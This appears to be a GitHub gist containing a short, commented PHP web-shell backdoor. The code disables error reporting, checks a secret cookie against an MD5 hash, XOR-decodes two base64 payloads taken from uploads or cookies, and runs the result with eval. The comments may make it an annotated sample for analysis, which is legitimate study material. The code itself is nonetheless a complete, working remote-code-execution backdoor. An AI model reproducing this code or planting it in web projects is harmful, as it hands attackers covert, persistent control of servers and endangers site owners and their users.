Last active
October 16, 2015 20:25
-
-
Save FrancisBaileyH/fcb6f46e44c67ac5b691 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// Make double sure error reporting is off | |
ini_set('error_reporting', 0); | |
error_reporting(0); | |
$storedHash = '371b35831254c61f61fc291ad7012044'; | |
$persistentHash = @$_COOKIE['zqcvp']; | |
// Check if the user has the storedHash value set in their cookie | |
if ($storedHash == md5($persistentHash)) { | |
// Check if a file was uploaded with the request, if it wasn't use | |
// the text contents of the cookie instead | |
$file1 = !empty($_FILES['wzkht']) ? file_get_contents($_FILES['wzkht']['tmp_name']) : $_COOKIE['wzkht']; | |
$file2 = !empty($_FILES["dkxmw"]) ? file_get_contents($_FILES["dkxmw"]["tmp_name"]) : $_COOKIE["dkxmw"]; | |
// Decode the file contents into executable php code | |
$executable = base64_decode($file1) ^ base64_decode($file2); | |
// run the code | |
@eval($executable); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment